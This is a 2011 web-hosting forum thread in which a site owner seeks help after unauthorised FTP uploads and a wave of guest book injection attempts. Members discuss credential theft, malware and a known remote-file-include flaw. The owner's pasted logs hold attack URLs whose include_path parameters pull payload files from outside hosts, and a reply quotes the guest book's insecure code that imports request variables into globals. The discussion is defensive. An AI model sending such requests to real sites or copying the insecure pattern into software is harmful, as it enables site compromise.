Code Injection Attempts linked to FTP?

**TechnoBear** · Aug 13, 2011 05:47

My hosting company won't allow me to use SFTP or FTPS, so after three of my sites were hacked, I decided to upload files only through the cpanel file manager with a secure log-in.

Two days ago, I had quite a number of files to upload to one site, to update the guest book, so I used FTP for convenience and changed the passwords immediately afterwards. In the last 48 hours, there have been 38 code injection attempts on that site, all targeting the guest book. There were only two in the whole of the preceding two months, which makes me wonder if there is some connection here, although it's hard to see what. None of my other sites have been targeted recently, including another one on the same server.

Is this just a co-incidence, do you think?

**eldad** · Aug 15, 2011 04:21

Out of curiosity, how do you track the code injection attempts?

Can it be that the guest book version you are using has a public vulnerability? A common practice for automated injection bots is to search on Google for sites with specific plugins that are known to be vulnerable (the search terms are called Google Dorks - Google Hacking Database, GHDB, Google Dorks). It is their way to cover many sites but still target sites that are more likely to be vulnerable.

**TechnoBear** · Aug 15, 2011 05:35

Thanks for the information and the link.

Originally Posted by eldad

Can it be that the guest book version you are using has a public vulnerability?

I'm pretty sure that's not the problem. I can't find anything recent regarding the guest book, and nothing major at any time. I'm using the latest version. I also have the same script installed on another site and have had no problems. On both sites I renamed the directory when I installed it (for convenience, not obfuscation) and disallowed it in my robots.txt file. I know this doesn't keep out the bad guys, but at least I'm not advertising its presence on Google.

**eldad** · Aug 15, 2011 05:40

Interesting... A lot of questions can be asked...
From what IPs did the injection attempts come from? Did you see other visits from those IPs? Were the attempts from humans or bot agents? What are the injection vectors (any references online)?

**TechnoBear** · Aug 15, 2011 06:07

Four different IPs, from US, Spain, France and Bulgaria. No previous visits from those IP in the last couple of months (I haven't checked further back). I'm not sure how to tell if they're human or bot.
I did try looking online for more information, but couldn't find anything relevant. There were references to several other domains, but none of these flagged up anything particularly nasty at Site Advisor or elsewhere.
This is one of the sites that was hacked previously, and on that occasion files were uploaded by FTP. I have the IP address for the previous attack and there doesn't seem to be any connection.

**sparek** · Aug 15, 2011 07:40

If you have your account password stored anywhere on your personal computer and if your personal computer is infected with spyware or malware, then it may be sending out your username and password information. It wouldn't make any difference if you are using SFTP or FTPS to connect to your FTP account, or if you used the secure cPanel link. If your password is stored in plaintext or easily breakable encryption on your local computer, that information can be harvested if you are infected with malware.

A lot of malware will do this, just target your local computer and attempt to harvest your username and password. Then it is not relevant if your webhosting account is running an outdated and vulnerable script. Whoever gains access to your username and password has full access to your webhosting account.

**ParkinT** · Aug 15, 2011 07:42

What software product are you using to accomplish the FTP?
Perhaps it (freeware/malware) is logging your activity and then generating the extraneous traffic you see.

Try using FTP from the command line (Windows, Linux or Mac) and not some software WYSIWYG.

**TechnoBear** · Aug 15, 2011 08:01

There isn't, and never has been, any kind of malware on my computer, nor does anyone else have access to it or to my passwords (which are different for every site).

I stopped using FTP because I was advised it sends the password in plain text, making it easy to intercept. Using the command line would not make things any more secure, as far as I can see.

**deathshadow60** · Aug 15, 2011 10:38

I would much more suspect the guest book itself than FTP... Though again as already asked how are you tracking "code injection attempts" -- that part alone sounds kinda fishy.

**Mittineague** · Aug 15, 2011 11:01

A guestbook is one of the reasons I got into PHP years ago.

I had been busy learning (horrid) mark-up, inline styling, animated gifs galore and stupid javascript tricks for my new found web presence

I wanted a guestbook so I downloaded one and put it online.

After my site had been hacked (site, NOT guestbook) I traced it to several security flaws in the guestbook app (use of unsanitized global variables). I am now very wary of using third party apps. At times they may be intentionally malicious, other times once a vulnerability is published script-kiddies go hunting for them.

To get to my point,
Is the guestbook app from a trusted source?
Are you keeping up-to-date for security fixes assuming it's maintained?

**TechnoBear** · Aug 15, 2011 11:18

Originally Posted by Mittineague

To get to my point,
Is the guestbook app from a trusted source?
Are you keeping up-to-date for security fixes assuming it's maintained?

The guest book was installed via cpanel using Softaculous, and as mentioned in an earlier post, is the latest version. In fact, it was the need to update the guest book that led to me using FTP a couple of days ago, because of the number of files involved. (The other site on which I have the guest book I can update using the update feature in Softaculous, but for some reason that doesn't work properly on this site.)

I think the guest book is a red herring here. At the point when the site was hacked, there was no guest book installed. This site, and the other two that were hacked, were all small, static HTML-only sites - no PHP, no Javascript, no scripts of any kind.

**deathshadow60** · Aug 15, 2011 11:41

Originally Posted by TechnoBear

The guest book was installed via cpanel using Softaculous, and as mentioned in an earlier post, is the latest version.

Ouch and Ouch -- two things I don't trust to begin with... Generally Softascrewup is only as good as the ISP who keeps the scripts up to date -- did you use it to keep the updates or have you been updating it manually? Just exactly WHICH guestbook is it?

Originally Posted by TechnoBear

I think the guest book is a red herring here.

Funny, your new post makes me look even HARDER at it.

Originally Posted by TechnoBear

At the point when the site was hacked, there was no guest book installed. This site, and the other two that were hacked, were all small, static HTML-only sites - no PHP, no Javascript, no scripts of any kind.

Again, how are you 'tracking' that or knowing they were hacked... you're being a bit vague on that subject. (I'm starting to wonder if you know what a code injection IS).

**EastCoast** · Aug 15, 2011 15:36

Originally Posted by TechnoBear

There isn't, and never has been, any kind of malware on my computer, nor does anyone else have access to it or to my passwords (which are different for every site).

I recall analysing a hacking issue of some websites, where eventually by painstaking research the source was tracked down to a user who had absolutely insisted the exact same thing, except wireshark proved unequivocally that network packets with ftp logins were travelling outwards to russia from their pc

Some of the ftp stealing type trojans don't show up on common av software, so don't discount the possibility if there is a genuine issue.

It is more likely as deathshadow60 has pointed out that the guestbook is attracting the unwanted attention however, I'd check for any presence of it on exploit lists.

**TechnoBear** · Aug 16, 2011 06:48

Originally Posted by deathshadow60

Ouch and Ouch -- two things I don't trust to begin with... Generally Softascrewup is only as good as the ISP who keeps the scripts up to date -- did you use it to keep the updates or have you been updating it manually?

As I've said before, on one site I've used it to do the updates. On this site, it won't update properly via Softaculous and I've downloaded the updates from the official site.

Originally Posted by deathshadow60

Just exactly WHICH guestbook is it?

Lazarus Guest Book v1.15. All the directory permissions are set to 505 and the files to 404.

Originally Posted by deathshadow60

Again, how are you 'tracking' that or knowing they were hacked... you're being a bit vague on that subject. (I'm starting to wonder if you know what a code injection IS).

OK, I freely admit to being a novice in this area. It's one of the main reasons I joined this forum, to try to learn more about security. However, even I can spot an IP address that isn't mine in my FTP logs and a directory I didn't create in my Web space.

I didn't post details, because I didn't think it was relevant, but as you seem to suspect I'm havering, I'll give you the details now and apologise to everybody else for the long post.

I have a number of sites, of which three were hacked over the space of about a month. On one site, a directory called "allyn" containing a single file called "spilled.php" was added, my .htaccess file permissions were changed and the file itself was altered. The files were uploaded from 213.5.68.141, which is not my IP. I didn't notice it until a couple of weeks later, by which time Google had found around 230 supposed URLs for my site which I knew nothing about. e.g. mydomain//Auckland-volkswagen-cabrio-instrument-dashboard-symbols-warning-lights/ Most of the others are pornographic in nature. It was when one of these showed up in my AWStats that I first realised something was amiss and started to investigate further. I then checked all my other sites.

On another site - the one referred to in my original post in this thread - a directory called "narrator" containing a single file called "sherriffs.php" was added, my .htaccess file permissions were changed and the file itself was altered. The files were uploaded from 213.5.69.27, which is also not my IP. I discovered this one the day after it was hacked and removed the directory immediately. Two days later, this appeared in the logs:

Url: /narrator/sherrifs.php?sheme=157&redirect=http%3A%2F%2Fsecureweblogs.net%2Fstat%2Fcheck%2F
web.php&dgen=http%3A%2F%2Fsecurecheck3.net%2Fgenerator_root_image%2Fgenerator.php&secvalue
=5978197fcdec1d5de383c1b5f3431c41&cached=true&remove_file=true 95.168.165.98

Again, the IP address is not mine.

The third site had fours files added to the cgi-bin. I don't know exactly when or how, as there are no entries in the FTP logs apart from my own visits. The files added were:
cgiecho
randhtml.cgi
entropybanner.cgi
cgiemail
I have no idea what they did or were meant to do, as I couldn't read them i.e. the characters were displaying largely as boxes, as if in an unknown font. I had never had cause to use the cgi-bin and would probably never have discovered these had I not been scrutinizing everything after I found the first hack.

As I mentioned before, at this point all these sites consisted of nothing but static html pages.

My hosting company was not helpful, insisting any problem must originate at my end. A friend recommended Crawl Protect, which I have since been using on all my sites. I have found it surprisingly difficult to find beginners' security information on the Web, which again brings me back to this forum.

The 38 code injection attempts I mentioned are reported by Crawl Protect and logged as

Url: /guestbook.php//admin.php?include_path=http://sebri.net/templates/osCommRes/images/allnet.jpg?? 12.185.242.246
Url: /guestbook.php/admin.php?include_path=http://ztrackonline.com/images/tmp/x/sangatta.txt?? 94.23.83.227
Url: /guestbook.php//admin.php?include_path=http://www.yuriamorim.com//includes/domit/Z6.txt?? 87.120.106.5
Url: /guestbook.php/admin.php?include_path=http://ztrackonline.com/images/tmp/x/parepare.txt?? 213.251.135.16

etc etc. Need I mention that none of those IPs is mine?

Originally Posted by EastCoast

I recall analysing a hacking issue of some websites, where eventually by painstaking research the source was tracked down to a user who had absolutely insisted the exact same thing, except wireshark proved unequivocally that network packets with ftp logins were travelling outwards to russia from their pc

Some of the ftp stealing type trojans don't show up on common av software, so don't discount the possibility if there is a genuine issue.

I do realise that is the obvious problem. However, I'm running a Linux PC with all updates done. I don't use wi-fi, it isn't on a network and no-one else has access to it. Apart from a few well-known Firefox add-ons downloaded from Mozilla, there is nothing installed on this machine that didn't come from the official repositories. Nevertheless, I have scanned it (repeatedly) with ClamAV and found nothing. If you can suggest any further precautions I can take, I should be grateful.

Also, one site was hacked the day after I used FTP to upload files, but the other was hacked nearly three weeks after I'd last accessed it. Is it normal for hackers to wait that long after intercepting a password and risk it being changed?

Originally Posted by EastCoast

It is more likely as deathshadow60 has pointed out that the guestbook is attracting the unwanted attention however, I'd check for any presence of it on exploit lists.

I tried looking for that kind of information before I installed it and couldn't find any, which I took to be a good sign. Perhaps I'm missing something, but it seems OK and I've never had any problems with the other site, where the guestbook has been installed slightly longer.

Again, my apologies for a very long post.

**deathshadow60** · Aug 16, 2011 08:06

Can't say I've heard of lazarus, but poking my head into it's admin.php (which seems to be drawing the most attention)

Code:

if (!isset($PHP_SELF)) 
{
  $PHP_SELF = $_SERVER['PHP_SELF'];
  if (isset($_GET)) 
  {
    while (list($name, $value) = each($_GET)) 
    {
      $$name = $value;
    }
  }
  if (isset($_POST)) 
  {
    while (list($name, $value) = each($_POST)) 
    {
      $$name = $value;
    }
  }
  if (isset($_COOKIE)) 
  {
    while (list($name, $value) = each($_COOKIE)) 
    {
      $$name = $value;
    }
  }
}

*SIGH*... EVERY time I see this type of idiotic code my brain goes "WHAT THE HELL ARE THEY DOING?!?" -- be real fun to pass it something like admin.php?_SERVER

Sure, they have this fix after:

Code:

if (isset($include_path))
{
  die("Hacking Attempt!");
}

That's bubblegum on a leaky bike tire instead of using a real patch or replacing the tube... Though that explains your log entries as that's just bots trying to use a known exploit that's been patched. Of course christmas only knows how bad the entire server was pwned before it was patched -- especially since it sounds like you're on shared hosting, so if someone else is still running unpatched you could still get pwned.

Eval for the templates? Blindly trusting global vars? EVERYTHING in global scope? Total pwnage.

**sparek** · Aug 16, 2011 08:19

An FTP hack and a script hack are two completely different animals.

If someone is uploading material via FTP that are not authorized by you, then this means someone has access to your webhosting login information. How they got that information is unknown. Usually this means that you have malware running on your computer, either searching through the files on your computer for anything that would mention your username and password (an email, an FTP site manager, etc) or you have a packet sniffer installed on your computer, or perhaps somewhere on your network.

Since you said you are running Linux, I would think this would minimize the malware threat. I'm not aware of any such malware like this that runs on Linux, but that doesn't mean Linux is infallible.

Are there other computers that have your login information stored on them? Perhaps one of those computers is infected.

What some people don't realize, is that their own computer can be completely safe and completely free of any virus or malware. But if you log into your account from a public wifi hotspot, or at a public library, or any where else, the security of those areas has to be called into question. You're computer might be safe, but if you access your FTP account from a library terminal that is infected with malware, then that can steal your information.

A script hack means that an outside visitor, someone accessing your website from the Internet, has taken advantage of a security hole in a script on your account.

From what you have posted in the logs, it looks like someone is trying to exploit your guestbook using the admin.php remote file include exploit - CVE - CVE-2007-1486 (under review) - which was fixed in version 1.7.3. The information you posted from the logs just shows that they are attempting to exploit this. It doesn't necessarily mean that they are successful. If you are using version 1.15, you should be clear of this exploit. But again, this doesn't mean that there isn't another exploit in the script, but I don't see anything being disclosed. Lazarus Guestbook is up to version 1.16 but it is in beta, so 1.15 should be safe of any KNOWN threats.

The only time these two types of exploits can be combined is if you have a script vulnerability that allows a malicious user to read the files on your webhosting account. And if you are using the same username and password in your script's config files for MySQL access as your main webhosting account login, then those malicious users can steal that information and then log in via FTP.

You haven't stated if you are using cPanel or not. I come from a cPanel background, so I will use it as an example. This may not apply to you if you are not using cPanel.

If you have a config file for your script and if the script uses MySQL databases. If, in that config file, you use your main FTP username and password, then a malicious user that exploits the vulnerability in your script (assuming that a script on your account is vulnerable), then that person can read this information and then access your account via FTP. Because all that is needed for FTP access is a hostname (your domain name, which they obviously know) and a username and password (which was stolen from the config file).

With cPanel you can create separate MySQL username and assign them passwords. The MySQL username that is created will have your main username appended to it (in order to keep MySQL usernames unique in a shared hosting environment) so if you create a new username, but reuse your same password, then again all of this information is made available to the malicious user that exploited your site.

Bottom line, always use a MySQL user for accessing your MySQL database, and never reuse your main account password.

Worth mentioning, the config file routine is not the only way a malicious user can glean information. If a malicious user gains access to reading the files on your webhosting account through a script vulnerability, then they could conceivably read any email that might also be stored on your webhosting account. If your login information is stored there, then again this information can be stolen.

I would be more concerned with how these IP addresses are getting your FTP information to log into your account. I assume you are using a strong password, something that is not hard to guess, in that case you have a vulnerability somewhere. Either on your computer, on a computer, or in a script on your website. You would immediately need to change your password, and tell nobody what the new password is. Don't log into your account from any other computer, and note if you have to change any configuration files because of this updated password. If your FTP account is compromised again, then this will help narrow down which computer or which system is vulnerable.

It is possible, although highly unlikely, that your webhosting provider has been hacked and someone may have root access on the server. I say unlikely because your host should be seeing a number of infected websites on their server if they have been rooted. And generally a rooted server is not used to upload malicious links like you have stated. If someone has root access on a server, then they can do anything to that server, including deleting everything.

**Crazybanana** · Aug 16, 2011 11:16

as the lazarus guestbook has been known for several flaws - like the remote xss attack, allowing a user to create specially crafted url to execute arbitrary code, or to inject arbitrary script or html via the show parameter or img parameter, after the name of an existing file - there are a few other vulnerabilities that may help an attacker to steal cookiebased authentication credentials and launch other attacks - so there you have several input validation and several input manipulation vulnerabilities..

In other words: the kids know about these previous vulnerabilities, and are trying to exploit 'em...

But as sparek told ya, with 1.15 you should be safe for any known threats

They probably used a vulnerability scanner, and maybe they postet the result log for others to have fun... maybe your site(s) listed as vulnerable on some forums etc ,because of the previous hack

If everything is running the latest version/patches this may go away on its own - but I would monitor it anyway to keep an eye on whats going on

**TechnoBear** · Aug 21, 2011 09:36

Thanks, guys, for the replies and helpful information.